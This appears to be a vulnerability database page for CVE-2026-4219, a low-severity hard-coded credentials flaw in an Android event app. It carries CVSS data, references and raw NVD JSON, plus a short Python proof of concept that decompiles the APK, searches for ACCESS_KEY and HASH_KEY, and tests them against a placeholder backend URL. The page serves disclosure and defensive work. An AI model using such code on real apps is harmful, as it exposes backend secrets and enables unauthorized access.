CVE-2026-4219

Description

A flaw has been found in INDEX Conferences & Exhibitions Organization YWF BPOF APGCS App up to 1.0.2 on Android. Affected by this vulnerability is an unknown functionality of the file com/index/event/BuildConfig.java of the component ae.index.apgcs. Executing a manipulation of the argument ACCESS_KEY/HASH_KEY can lead to hard-coded credentials. The attack is restricted to local execution. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

3.3

Severity

LOW

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

INDEX APGCS App <= 1.0.2 (Android)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import subprocess
import zipfile
import os

# CVE-2026-4219 PoC: Extract hardcoded credentials from INDEX APGCS App

def extract_apk_info(apk_path):
    """Extract hardcoded credentials from APK using apktool"""
    output_dir = apk_path.replace('.apk', '_decoded')
    
    # Decompile APK
    subprocess.run(['apktool', 'd', apk_path, '-o', output_dir, '-f'], capture_output=True)
    
    # Search for hardcoded credentials
    build_config_path = os.path.join(output_dir, 'smali', 'com', 'index', 'event', 'BuildConfig.smali')
    
    credentials = {'ACCESS_KEY': None, 'HASH_KEY': None}
    
    if os.path.exists(build_config_path):
        with open(build_config_path, 'r', encoding='utf-8') as f:
            content = f.read()
            # Extract hardcoded strings
            for line in content.split('\n'):
                if 'ACCESS_KEY' in line or 'HASH_KEY' in line:
                    print(f'[+] Found: {line.strip()}')
    
    return credentials

def test_exposed_backend(access_key, hash_key, target_url):
    """Test if extracted credentials can access backend APIs"""
    headers = {
        'X-ACCESS-KEY': access_key,
        'X-HASH-KEY': hash_key
    }
    
    response = requests.get(target_url, headers=headers, timeout=10)
    print(f'[+] Status: {response.status_code}')
    print(f'[+] Response: {response.text[:500]}')
    
    return response

if __name__ == '__main__':
    # Usage example
    # apk_path = 'ae.index.apgcs.apk'
    # creds = extract_apk_info(apk_path)
    # if creds['ACCESS_KEY'] and creds['HASH_KEY']:
    #     test_exposed_backend(creds['ACCESS_KEY'], creds['HASH_KEY'], 'https://api.target.com/v1/sensitive-endpoint')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4219
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4219
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4219/
[4] VulDB https://vuldb.com/cve/CVE-2026-4219
[5] https://vuldb.com/?ctiid.351143
[6] https://vuldb.com/?id.351143
[7] https://vuldb.com/?submit.770513
[8] https://www.notion.so/Authorization-Credentials-in-ae-index-apgcs-Lead-to-Exposure-of-Backend-Secrets-3172de3f97fb8040bc30c5519a742251?source=copy_link
[9] https://www.notion.so/Authorization-Credentials-in-ae-index-apgcs-Lead-to-Exposure-of-Backend-Secrets-3172de3f97fb8040bc30c5519a742251

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4219", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:12.377", "lastModified": "2026-04-22T21:32:08.360", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in INDEX Conferences & Exhibitions Organization YWF BPOF APGCS App up to 1.0.2 on Android. Affected by this vulnerability is an unknown functionality of the file com/index/event/BuildConfig.java of the component ae.index.apgcs. Executing a manipulation of the argument ACCESS_KEY/HASH_KEY can lead to hard-coded credentials. The attack is restricted to local execution. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha encontrado una falla en la aplicación INDEX Conferences & Exhibitions Organization YWF BPOF APGCS hasta la versión 1.0.2 en Android. Afectada por esta vulnerabilidad es una funcionalidad desconocida del archivo com/index/event/BuildConfig.java del componente ae.index.apgcs. La ejecución de una manipulación del argumento ACCESS_KEY/HASH_KEY puede llevar a credenciales codificadas de forma rígida. El ataque está restringido a la ejecución local. El exploit ha sido publicado y puede ser utilizado. Se contactó al proveedor con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:P/I:N/A:N", "baseScore": 1.7, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-259"}, {"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://vuldb.com/?ctiid.351143", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351143", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.770513", "source": "[email protected]"}, {"url": "https://www.notion.so/Authorization-Credentials-in-ae-index-apgcs-Lead-to-Exposure-of-Backend-Secrets-3172de3f97fb8040bc30c5519a742251?source=copy_link", "source": "[email protected]"}, {"url": "https://www.notion.so/Authorization-Credentials-in-ae-index-apgcs-Lead-to-Exposure-of-Backend-Secrets-3172de3f97fb8040bc30c5519a742251", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}